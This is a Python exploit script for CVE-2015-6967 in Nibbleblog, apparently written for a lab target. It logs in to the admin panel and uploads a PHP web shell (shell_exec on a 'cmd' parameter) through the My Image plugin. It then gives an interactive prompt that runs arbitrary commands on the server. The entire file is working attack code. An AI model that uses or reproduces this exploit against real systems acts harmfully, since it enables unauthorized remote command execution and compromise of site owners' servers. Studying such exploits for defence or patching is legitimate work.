#!/usr/bin/python3
#CVE: CVE-2015-6967
# Author: FredBrave


import signal, sys, requests, optparse

def Exiting(sig, frame):
    print("\nExiting...\n")
    sys.exit(1)

#CTRL +C 
signal.signal(signal.SIGINT, Exiting)

def helPanel():
    print("python3 exploit.py --url http://10.10.10.10/ --username admin --password 123456")


def get_arguments():
    parser = optparse.OptionParser()
    parser.add_option('--url', dest='target', help='Url Target')
    parser.add_option('--username', dest='user', help='User to login')
    parser.add_option('--password', dest='password', help='Password to login')
    (options, arguments) = parser.parse_args()
    if not options.target:
        helPanel()
        parser.error("[-] Please indicate the url of target --url, for more information... --help")
    if not options.user:
        helPanel()
        parser.error("[-] Please indicate the username --username, for more information... --help")
    if not options.password:
        helPanel()
        parser.error("[-] Please indicate the password, for more information... --help")
    return options

def login(target, username, password):
    login_url = f'{target}/nibbleblog/admin.php'
    data = {"username": username, "password": password}
    try:
        r = SESSION.post(login_url, data, timeout=10, verify=False)
        if 'Dashboard' in r.text:
            print("[ + ] Login Succesfuly!")
        else:
            sys.exit("[ ! ] Login failed, exiting")
    except Exception as e:
        sys.exit("[-] Exception: {}".format(e))

def execute_commands(target, username, password):
    payload = '<?php echo shell_exec($_GET["cmd"]); ?>'
    login(target, username, password)
    image_url = f"{target}/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image"
    exec_path = f"{target}/nibbleblog/content/private/plugins/my_image/image.php"
    try:
          req = SESSION.get(image_url, timeout=10, verify=False)
    except Exception as e:
        sys.exit("[-] Exception: {}".format(e))
    if 'Plugins :: My image' in req.text:
        print("[+] Uploading shell...")

        data = {
            "plugin": (None, 'my_image'), "title": (None, 'My image'), "position": (None, 4), "caption": "",
            "image": ('doesnt_matter.php', payload, "application/x-php", {'Content-Disposition': 'form-data'}),
            "image_resize": (None, 1), "image_width": (None, 200), "image_height": (None, 200), "image_option": (None, 'auto')
        }
        
        try:
            upload = SESSION.post(url=image_url, files=data, timeout=10, verify=False)

            if 'Changes has been saved successfully' in upload.text:
                print(f"[ * ] Shell has been uploaded!")
                print(75 * '-')
                while True:
                    params = {"cmd": input("cmd> ")}
                    command = SESSION.get(url=exec_path, params=params, verify=False)
                    print(command.text)
            else:
                sys.exit("[ - ] Shell upload failed, exiting")
        except Exception as e:
            sys.exit("[-] Exception: {}".format(e))
    else:
        sys.exit("Error uploading shell, exiting!")    



def main():
    options = get_arguments()
    target = options.target
    username = options.user
    password = options.password
    execute_commands(target, username, password)

if __name__ == "__main__":
    SESSION = requests.Session()
    main()